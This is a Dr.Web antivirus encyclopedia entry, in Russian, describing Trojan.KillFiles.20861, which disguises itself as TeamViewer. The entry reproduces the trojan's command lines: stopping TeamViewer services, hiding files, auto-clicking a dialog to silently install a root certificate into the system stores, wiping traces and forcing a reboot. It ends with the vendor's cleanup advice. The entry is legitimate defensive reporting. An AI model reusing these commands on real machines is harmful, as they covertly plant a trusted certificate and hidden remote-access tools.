Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.KillFiles.20861

Добавлен в вирусную базу Dr.Web: 2015-01-07

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\TeamViewer\HelpUser\rst93615.exe' cmdwait 8427 exitwin reboot force
  • '%TEMP%\TeamViewer\HelpUser\tv.exe' execmd "echo. & tv killprocess "rst93615.exe" & del /a /f /q "rst*" & attrib +r "tv.exe" & attrib +h +s +r "..\HelpUser" & if not exist "%APPDATA%" (ren "*e.dll" "TeamViewer_Resource.dll" & exit) else tv service stop "TeamViewer8" & tv service stop "TeamViewer7" & tv service stop "TeamViewer6" & tv service stop "TeamViewer5" & tv service stop "TeamViewer4" & set "PROMPT=" & set "BOXN=" & start "" "TeamViewer.exe" & del /a /f /q "*.tmp" & pushd "%HOMEPATH%\temp\TeamViewer" & attrib +r "Version4\*.h*" & attrib +r "Version5\*.h*" & popd & pushd "%TEMP%\TeamViewer" & attrib +r "Version5\*.h*" & attrib +r "Version6\*.h*" & attrib +r "Version7\*.h*" & attrib +r "Version8\*.h*" & popd & start "" tv cmdwait 7823 execmd "ren "*ce.dll" "*.tmp" & ren "*e.dll" "TeamViewer_Resource.dll"""
  • '%TEMP%\TeamViewer\HelpUser\tv.exe' killprocess "rst93615.exe"
  • '%TEMP%\TeamViewer\HelpUser\tv.exe' execmd "echo. & set "K=\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates" & set "K1=\0549936BF36D666303FA40A6870BA900A055FD5C" & call reg query "HKLM%K%%K1%" /v "Blob" && (del /a /f /q "cm.*" & exit) & call reg query "HKCU%K%%K1%" /v "Blob" && (del /a /f /q "cm.*" & exit) & tv win dlgclick class "#32770" 2 & tv win dlgclick class "#32770" 7 & tv clipboard readfile "~~$folder.nircmd$\cm.cm3" & start "" tv loop 50 100 script "cm.cm1" & cm /add "cm.cm2" /s Root /r currentUser /all && (tv regsetval binary "HKCU~~$sys.k$~~$sys.k1$" "Blob" "~~$clipboard$") & cm /add "cm.cm2" /s Root /r localMachine /all && (tv regsetval binary "HKLM~~$sys.k$~~$sys.k1$" "Blob" "~~$clipboard$") & tv clipboard clear & ren "cm.*" "tmp.*" & del /a /f /q "*tmp*""
  • '%TEMP%\TeamViewer\HelpUser\tv.exe' shellcopy "~$nir.exefile$" "~$folder.nircmd$\rst93615.exe" noerrorui silent yestoall
  • '%TEMP%\TeamViewer\HelpUser\tv.exe' filldelete "*cmd*"
Запускает на исполнение:
  • '<SYSTEM32>\reg.exe' query "HKCU\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\0549936BF36D666303FA40A6870BA900A055FD5C" /v "Blob"
  • '<SYSTEM32>\wbem\wmiadap.exe' /R /T
  • '<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\0549936BF36D666303FA40A6870BA900A055FD5C" /v "Blob"
  • '<SYSTEM32>\logonui.exe' /status /shutdown
Пытается завершить работу операционной системы Windows.
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\TeamViewer\HelpUser\TeamViewer_Service.exe
  • %TEMP%\TeamViewer\HelpUser\tv.exe
  • %TEMP%\TeamViewer\HelpUser\TeamViewer_Resourсe.dll
  • %TEMP%\TeamViewer\HelpUser\TeamViewer.ini
  • %TEMP%\TeamViewer\HelpUser\TeamViewer_Desktop.exe
  • %TEMP%\TeamViewer\HelpUser\tv_x64.dll
  • %TEMP%\TeamViewer\HelpUser\rst93615.exe
  • %TEMP%\TeamViewer\HelpUser\tv_x64.exe
  • %TEMP%\TeamViewer\HelpUser\tv_w32.exe
  • %TEMP%\TeamViewer\HelpUser\tv_w32.dll
  • %TEMP%\TeamViewer\HelpUser\TeamViewer.exe
  • %TEMP%\TeamViewer\HelpUser\x86\tvmonitor.cat
  • %TEMP%\TeamViewer\HelpUser\x86\TVMonitor.inf
  • %TEMP%\TeamViewer\HelpUser\x64\TVMonitor.sys
  • %TEMP%\TeamViewer\HelpUser\x64\tvmonitor.cat
  • %TEMP%\TeamViewer\HelpUser\x64\TVMonitor.inf
  • %TEMP%\TeamViewer\HelpUser\cm.cm2
  • %TEMP%\TeamViewer\HelpUser\cm.cm3
  • %TEMP%\TeamViewer\HelpUser\cm.cm1
  • %TEMP%\TeamViewer\HelpUser\x86\TVMonitor.sys
  • %TEMP%\TeamViewer\HelpUser\cm.exe
Удаляет следующие файлы:
  • <SYSTEM32>\wbem\Performance\WmiApRpl.ini
Другое:
Ищет следующие окна:
  • ClassName: 'StatusWindowClass' WindowName: ''
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'EDIT' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке